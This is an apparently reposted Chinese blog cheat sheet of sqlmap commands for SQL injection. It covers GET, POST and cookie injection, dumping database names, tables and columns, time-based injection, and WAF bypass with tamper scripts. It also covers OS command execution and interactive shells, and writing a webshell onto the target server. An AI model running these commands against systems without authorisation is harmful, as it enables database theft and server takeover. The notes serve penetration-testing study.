标签:批量 log 表名 col cookie mysql htm 数据 提权
SQL注入
三种方式
1.GET方式
[https://www.jianshu.com/p/fcdc0f86633a] [https://mp.weixin.qq.com/s?__biz=MzI3NzIzMzg3Mw==&mid=100000054&idx=1&sn=71f6c214f3833d9ca20b9f7dcd9d33e4#rd]
get与Post的区别,其中get参数通过url传递,poet放在request body中
sqlmap -u "URL"
2.POST方式
POST传递的参数要抓包才能看到
sqlmap -u "URL" --data "xx=yy"
sqlmap.py -r search-test.txt -p tfUPass [Text中的内容可以通过BP抓包获得POST参数]
3.Cookie方式
sqlmap -u "URL" --cookie "Cookie数据"
mysql注入
sqlmap -u "url" --current-db //获取库名
--tables -D "库名"
--columns -T "表名" -D “列名”
--dump
延时注入在什么情况下使用:页面无变化、无法用布尔真假判断、无法报错的情况下可以使用延时注入
--delay 1
-safe-freq
SQLMAP进行命令执行(提权)
sqlmap -u "url" --os-cmd=”命令“(使用交互式参数要知道网站的绝对路径)
--os-shell 交互式命令实现和文件上传两个php页面
Tamper 绕WAF
--tamper="脚本名字"
本地写入webshell --file-write "./mst/mst.txt"(本地文件的地址)
目标文件的地址路径 --file-dest "d:/www/1.html"
结合BP批量检测
sqlmap -l burp.log --batch -smart
batch:会自动选择yes smart:启发式快速判断,节约时间
标签:批量 log 表名 col cookie mysql htm 数据 提权
原文地址:https://www.cnblogs.com/rookieDanny/p/10485342.html